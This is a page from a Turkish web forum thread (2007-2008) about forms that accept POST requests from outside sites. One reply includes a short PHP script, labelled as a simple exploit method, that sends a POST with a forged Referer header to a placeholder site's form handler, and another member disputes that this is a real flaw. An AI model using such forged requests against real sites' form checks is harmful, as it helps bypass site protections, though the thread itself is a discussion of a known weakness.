Güvenlik Sorunu ( Dışarıdan Post ) - Sayfa 2

31-12-2007, 10:16:57

#10

Kimlik doğrulama veya yönetimden onay bekliyor.

Bartuc adlı üyeden alıntı: mesajı görüntüle

register_globals niye on oluyo ki açıklara sebebiyet verdiğinden ötürü artık kullanılmayan bir özelik. Dediğim yok en rahatıdır. ama session da farklı bir çözüm.

Register_Globals Off Olsa bile veri yollarken header'e

"Referer: http://www.benimsitem.com\r\n"

Yazmak yeterlidir Burcu2012 Eğerki Kodları opensource Olarak dağıtmayacaksan
bartuc Dediği şekilde Yapabilirsin Ama Kafaya Takan Biri zaten Her Yolu Dener

Aşağıda basit Bir exploit Etme yöntemi var

<?php



// the site we want to attack

$host = "www.mysite.com"; 



// the file we want to attack

$file = "formprocess.php";



// construct a header for our request

$hdrs = array( 'http' => array(

    'method' => "POST",



    'header'=> "accept-language: en\r\n" . 

        "Host: $host\r\n" .

        "Referer: http://$host\r\n" .  // Setting the http-referer

        "Content-Type: application/x-www-form-urlencoded\r\n" .

        "Content-Length: 33\r\n\r\n" .

        "username=mustap&comment=NOCOMMENT\r\n"

    )

);



// get the requested page from the server

// with our header as a request-header



$context = stream_context_create($hdrs);

$fp = fopen("http://" . $host . "/" . $file, 'r', false, $context);

fpassthru($fp);

fclose($fp);

?>

01-01-2008, 02:14:05

#11

~~Hard_Love~~

Üyeliği durduruldu

sen hata yapıyorsun dostum. örneğin şu var. session geçerli olmuşsa yani login isen zatem gönderebilmen normaldir. ben vbulletini denedim vbulletinde oldu.

masaüstüne kaydettim sayfayı ve gönderdim. Bu bir hata değildir.